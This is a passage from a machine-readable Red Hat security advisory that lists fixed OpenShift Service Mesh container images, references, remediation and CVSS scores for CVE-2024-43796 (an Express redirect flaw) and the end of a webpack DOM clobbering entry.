"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
